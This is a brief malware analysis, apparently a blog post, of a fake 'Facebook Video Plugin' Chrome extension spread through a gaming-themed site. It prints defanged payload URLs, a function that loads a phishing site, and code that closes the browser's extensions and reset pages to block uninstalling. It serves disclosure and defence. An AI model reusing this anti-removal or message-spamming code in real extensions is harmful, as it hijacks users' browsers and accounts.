hxxp://amk-mt2.com/
If you view the website in Chrome and you try play the video, it will ask you to install “Facebook Video Plugin” extension:
hxxps://chrome.google.com/webstore/detail/facebook-video-plugin/akagdpdjofpfkeolfhccmfbahdeokpog
This extension will inject some javascripts (main target sites are the Facebook and Twitter).
Currently the javascript for Facebook:
removed
This script will send messages to your chat partners. And also check this function in it:
function qweqwexd(){ qwecek("hxxp://fun-metin2.com/"+Math.random(0, 9999)); }
Another fake site, and it’s already detected as phishing site by BitDefender.
The injected script for Facebook comes from here:
hxxp://www.amk-mt2.com/user/s.php
The Twitter injector is inactive now, but here is the location:
hxxp://www.amk-mt2.com/user/t.php
The extension also will block the extensions page (so you can’t uninstall it from there) with this code:
if(n["url"]["indexOf"]("chrome://extension")>=0||n["url"]["indexOf"]("chrome://chrome/extension")>=0||n["url"]["indexOf"]("chrome://settings/resetProfileSettings")>=0) { chrome["tabs"]["remove"](n["id"]); }
Reported to virus AT avast DOT com